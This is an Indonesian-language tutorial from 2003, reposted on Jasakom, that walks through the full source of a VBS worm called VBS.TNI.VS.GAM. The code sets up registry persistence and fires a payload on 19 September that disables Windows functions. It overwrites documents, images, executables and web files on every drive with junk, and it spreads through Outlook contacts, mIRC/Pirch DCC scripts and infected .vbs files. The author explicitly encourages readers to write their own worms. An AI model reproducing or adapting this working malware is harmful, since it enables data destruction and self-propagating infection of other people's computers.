jasakom tutorial vbs.tni.vs.gam
TRANSCRIPT
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
TUTORIAL VBS.TNI.VS.GAM.WORM
Oleh sevenC / N0:7 Published: September 17, 2003
Setelah anda membaca tulisan saya ini, saya sangat mengharapkan anda bisa segera bisa membuat code2 worm anda sendiri dan beraksi menuangkan imajinasi anda kedalam code2 worm buatan anda sendiri. WARNING : Seperti biasa, saya menulis artikel ini 100% ditujukan sebagai sarana pengetahuan saja,dan saya tidak mau menanggung resiko sekecil apapun jika ada penyalahgunaan artikel yang saya buat ini. ------------------------------------------code & penjelasan dimulai dari sini 'VBS.GAM-VS-TNI.sevenC by N0:7 'It would be given to idiot person (SPTH) 'Bentuk perlawanan SevenC terhadap penindasan HAM di ACEH '+++++sevenC+++++
Ini baris2 pertama tau maksudnya ? menggapa diawali tanda (') ? yahh bener itu baris cuma buat komentar aja dan gak bakal dieksekusi... syaratnya ya harus diawali tanda petik ini (').
on error resume next
Jika anda berada dalam pemrograman yangg berifat basic2 jangan pernah melupakan baris ini, mengapa ? Karna program worm yang akan anda buat pasti akan berhenti jika ada kesalahan pertama kali sewaktu dieksekusi,anda tentunya gak mau worm buatan anda berhenti ditengah atau bahkan diawal jalan bukan ? hehehehe....
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder , STRINGMAN
Sebelum memberi nilai pada variabel,adaa baiknya anda mendeklarasikan terlebih dahulu variabel2 yang akan anda beri nilai / data.
Set fso = createobject("scripting.filesystemobject")
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
Menset variabel fso agar bisa menulis//membaca objek,ini musti ditulis karna akan sangat berguna sekali nanti.
TNI = fso.getspecialfolder(0)
Menset TNI dengan menggunakan variable fso yang telah kita deklarasikan tadi dengan menambahkan fungsi .getspecialfolder(0) yang artinya worm aseli/backup anda akan terletak pada folder ini,difolder apakah itu ? yaa... betul untuk (0) adalah folder windowz
GAM = TNI & "\system.vbs"
Nah ini dia worm backup dengan nama syystem.vbs yang berada dalam direktori TNI tadi.
Set MEGAWATI = createobject("wscript.shell")
Menset megawati agar menjalankan wscrippt untuk mengeksekusi code2 worm ini.
MEGAWATI.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & GAM & " %"
Membuat worm backup tersebut (system.vvbs) otomatis dijalankan setiap windows booting
fso.copyfile wscript.scriptfullname, GAM
Membuat copyan (textream) seluruh skriip worm ini untuk dicetak pada system.vbs (worm backup)
'I will give this at my birthday 'Gw akan kasih hadiah ini waktu gw ulang tahun heheheheh.... If month(now) = 9 and day(now) = 19 then MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD" MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1, "REG_DWORD" MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", 1, "REG_DWORD"
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", 1, "REG_DWORD" MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 1, "REG_DWORD" end if
Ini payload yang gw buat pada hari ulaang tahun gw 19 september,jadi setiap tanggal tsb payload ini dijalankan.
If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\wtyeuy928090266") <> 1 then WW32145 end if If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\SSSSSSS12XCV") <> 1 then LOGHARYTHM1Z end if If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\RTWYJGJGSKK1202") <> 1 then SEVENDUST end if
Ini teknik gw yang gw kasih nama "seveen-fake-the-shitty-reg (SFTSR) ",AV2 tahun 2002 belum bisa menditeksinya sebenarnya baris2 diatas cuma manipulasi statement kondisi yang memakai manipulasi file *.reg,yang intinya cuma sebagai loncatan2 kepada fungsi2 ini :
fungsi WW32145() fungsi LOGHARYTHM1Z() fungsi SEVENDUST()
Jika loe minat untuk mempelajari lebih jauh ttg teknik ini silahkan kunjungin homepage gw http://sevenc.vze.com STRINGMAN = "777777777raursuyrsuaystiu77777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 7777777777777777777777777777777777777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777! 777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 777777777777777777777777 777777777777777777777777777777777777777777777777777777777777777777777777777777 77777777777777777777777777777777HAHAHAHAHAH THIS IS MY SEVENS STRING FOR YOU WHERE IS YOUR AV'S ?"
Memberi data string pada variabel STRIINGMAN. info : ini digunakan untuk merusak file2 program dan bukan untuk penyebaran (sevenC's warning : SANGAT BERBAHAYA)
Set Drives=fso.drives For Each Drive in Drives If drive.isready then Dosearch drive end If Next
sepertinya baris2 diatas pernah saya jjelaskan di jasakom, dengan judul "FUNGSI WORM VBS" yaitu teknik bagaimana worm  bisa menyebar dan menginfeksi file2 di seluruh harddisk.
function Dosearch(path) on error resume next Set Folder=fso.getfolder(path) Set Files = folder.files
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
For Each File in files If fso.GetExtensionName(file.path)="htm" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="html" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="js" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="com" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="exe" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="php" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="jsp" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="txt" then on error resume next set drop = fso.createtextfile(File.path)
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="mp3" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="asp" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="doc" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if If fso.GetExtensionName(file.path)="jpg" then on error resume next set drop = fso.createtextfile(File.path) drop.writeline stringman drop.close end if next Set Subfolders = folder.SubFolders For Each Subfolder in Subfolders Dosearch Subfolder.path Next end function
Ini juga terdapat pada tutorial saya yang berjudul "FUNGSI WORM VBS" nah loe bisa liat ekstensi2 file yang akan dirusak oleh worm ini seperti jpg,doc,asp dll
'AntiDeletion function 'I take this from [K]alamar Set Kalamar = fso.opentextfile(wscript.scriptfullname) sevenC = Kalamar.readall Kalamar.close Do if not(fso.fileexists(wscript.scriptfullname)) then set ANTISCRIPT= fso.createtextfile(wscript.scriptfullname) ANTISCRIPT.write sevenC
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
ANTISCRIPT.close end if KALAMAR2 = MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate") If KALAMAR2 <> "wscript.exe " & GAM & " %" then MEGAWATI.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & GAM & " %" end if KALAMAR2= "" loop
Ini teknik antideletion yang gw dapet dari [K], gw pernah buat tutorial di jasakom Function WW32145() Set HK6Q2788 = CreateObject("Outlook.Application") If HK6Q2788 = "Outlook" Then Set LFD818HB = HK6Q2788.GetNameSpace("MAPI") Set MS97DFA0 = LFD818HB.AddressLists For Each I6166352 In MS97DFA0 If I6166352.AddressEntries.Count <> 0 Then CFJ3AVGM = I6166352.AddressEntries.Count For G2T0QB76 = 1 To CFJ3AVGM Set UF0MVV64 = HK6Q2788.CreateItem(0) Set RHR543O8 = I6166352.AddressEntries(G2T0QB76) UF0MVV64.To = RHR543O8.Address UF0MVV64.Subject = "Very Important!" UF0MVV64.Body = "Hi:" & vbcrlf & "Please view this file, it's very important to help my country" & vbcrlf & "" execute "set SG63KH0F =UF0MVV64." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115) I2512RET = V2F5FODG UF0MVV64.DeleteAfterSubmit = True SG63KH0F.Add I2512RET If UF0MVV64.To <> "" Then UF0MVV64.Send End If Next End If Next End If End function
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
Ini fungsi dari variabel WW32145() berrguna untuk penyebaran worm melalui outlook.function
function LOGHARYTHM1Z() If N0WARFORIRAK <> "" Then FRS46KB8 = MEGAWATI.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If fso.fileexists("c:\mirc\mirc.ini") Then N0WARFORIRAK = "c:\mirc" ElseIf fso.fileexists("c:\mirc32\mirc.ini") Then N0WARFORIRAK = "c:\mirc32" ElseIf fso.fileexists(FRS46KB8 & "\mirc\mirc.ini") Then N0WARFORIRAK = FRS46KB8 & "\mirc" ElseIf fso.fileexists(FRS46KB8 & "\mirc32\mirc.ini") Then N0WARFORIRAK = FRS46KB8 & "\mirc" Else N0WARFORIRAK = "" End If End If If N0WARFORIRAK <> "" Then Set ANTIUSA = fso.CreateTextFile(N0WARFORIRAK & "\script.ini", True) ANTIUSA = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{" ANTIUSA = ANTIUSA & vbCrLf & "n0=on 1:JOIN:#:{" ANTIUSA = ANTIUSA & vbCrLf & "n1=Â /if ( $nick == $me ) { halt }" ANTIUSA = ANTIUSA & vbCrLf & "n2=Â /." & Chr(100) & Chr(99) & Chr(99) & " send $nick " ANTIUSA = ANTIUSA & GAM ANTIUSA = ANTIUSA & vbCrLf & "n3=}" script.Close End If End Function
ini fungsi dari variabel LOGHARYTHM1Z berguna untuk penyebaran worm melalui mirc
SEVENDUST() If THEASSH0L3 <> "" Then FRS46KB8 = MEGAWATI.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If fso.fileexists("C:\Pirch98\events.ini") Then THEASSH0L3 = "C:\Pirch98" ElseIf fso.fileexists(FRS46KB8 & "\Pirch98\events.ini") Then BIP78A4V = FRS46KB8 & "\Pirch98" else
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
THEASSH0L3 = "" END IF END IF If THEASSH0L3 <> "" Then Set MB534QR6 = fso.CreateTextFile(THEASSH0L3 & "\script.ini", True) MB534QR6.writeline "[Levels]" MB534QR6.writeline "Enabled=1" MB534QR6.writeline "Count=6" MB534QR6.writeline "Level1=000-Unknows" MB534QR6.writeline "000-UnknowsEnabled=1" MB534QR6.writeline "Level2=100-Level 100" MB534QR6.writeline "100-Level 100Enabled=1" MB534QR6.writeline "Level3=200-Level 200" MB534QR6.writeline "200-Level 200Enabled=1" MB534QR6.writeline "Level4=300-Level 300" MB534QR6.writeline "300-Level 300Enabled=1" MB534QR6.writeline "Level5=400-Level 400" MB534QR6.writeline "400-Level 400Enabled=1" MB534QR6.writeline "Level6=500-Level 500" MB534QR6.writeline "500-Level 500Enabled=1" MB534QR6.writeline "[000-Unknowns]" MB534QR6.writeline "User1=*!*@*" MB534QR6.writeline "UserCount=1" MB534QR6.writeline "Events1= ON JOIN:#: /dcc send $nick " & GAM MB534QR6.writeline "EventCount=1" MB534QR6.writeline "[100-Level 100]" MB534QR6.writeline "UserCount=0" MB534QR6.writeline "EventCount=0" MB534QR6.writeline "[200-Level 200]" MB534QR6.writeline "UserCount=0" MB534QR6.writeline "EventCount=0" MB534QR6.writeline "[300-Level 300]" MB534QR6.writeline "UserCount=0" MB534QR6.writeline "EventCount=0" MB534QR6.writeline "[400-Level 400]" MB534QR6.writeline "UserCount=0" MB534QR6.writeline "EventCount=0" MB534QR6.writeline "[500-Level 500]" MB534QR6.writeline "UserCount=0" MB534QR6.writeline "EventCount=0" END IF end function
Ini fungsi SEVENDUST() berguna untuk mmenyebarkan worm melalui pirch98 Function E2D8VU73(LEDKTM5D)
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
CV757O21 = LEDKTM5D Set BSID3GF6 = fso.GetFolder(CV757O21) Set GOM9KI8K = BSID3GF6.Files For Each OM28U374 In GOM9KI8K If lcase(OM28U374.Name) = "mirc.ini" Then LOGHARYTHM1Z(OM28U374.ParentFolder) End If If fso.GetExtensionName(OM28U374.path) = "vbs" then fso.CopyFile wscript.scriptfullname,OM28U374.path,true End if If fso.GetExtensionName(OM28U374.path) = "vbe" then fso.CopyFile wscript.scriptfullname,OM28U374.path,true End if Next Set L7QK6Q27 = BSID3GF6.Subfolders For Each LN4FD818 In L7QK6Q27 Call (LN4FD818.path) Next End function
Ini fungsi E2D8VU73() barguna untuk mennyebarkan worm ke file2 VBS yang lain.
--------------------------------------------------------selesai Akhirnya selesai juga.... spesifikasi WORM.VBS.TNI.VS.GAM.b.VBSÂ : Terditeksi oleh NAV sebagai : WORM.VBS.VBSWG2@mm. Terditeksi oleh F-PROT sebagai : I-gam.b POLYMORPHIC : ga dipake FAKE-DROPING : Dipake JUMP-METHOD : gak dipake Infect files : VBS,VBE Droping Faker : htm,html,js,com,exe,php,txt,jpg mp3,jsp,doc,gif,asp PAYLOAD : dijalankan setiap tanggal 19 september (hari ultah sevenC) Worm ini termasuk ganas karna itu tidak diajurkan di test pada PC sendiri. karna bersifat destruktif maka versi beta tester worm ini tidak saya buat. salam hangat selalu dari GEMBEL & GELANDANGAN DEPOK. greetz & thankz to :
Jasakom.Com Copyright © Jasakom.Com. All rights reserved.
Documentation Vxer Center Http://Virus29a.blogspot.com
1. TEMAN2 SECTOR-S UNDERGROUND TEAM /Â S.U.T [ http://sectors.vze.com/ ] 2. [K]alamar for greatz support and AD technuiqe 3. VIRUS-BUSTER-INTERNATIONAL-FORUM / VBIF 4. #vir , #virii.ar , #virux , #virus 5. P-80 international security factor 6. Dan buat jasakom makasih aja udah mau mostingin. writen by sevenC / N0:7 19 AGUSTUS 2003 jam 21.42 WIB http://sevenc.vze.com/ [email protected] read this : Artikel ini murni ditujukan untuk pengetahuan semata, dan saya membuatnya dengan cuma2 karna saya sangat menghargai apa itu pengetahuan, dan apalah artinya ilmu saya jika tidak diamalkan. Jadi bagi Anda yang ingin meriping artikel ini, untuk kepentingan pribadi semata saya harap untuk menghapus nama asli / keterangan penulis yang ada dalam artikel ini. Karna saya pribadi tidak ingin jika artikel ini menjadi sarana pedoman lamer yang bersifat merusak. Mohon maaf jika ada kata2 saya yang menyinggung saudara,maklumlah...anak ABG... Wassalamualaikum Wr.Wb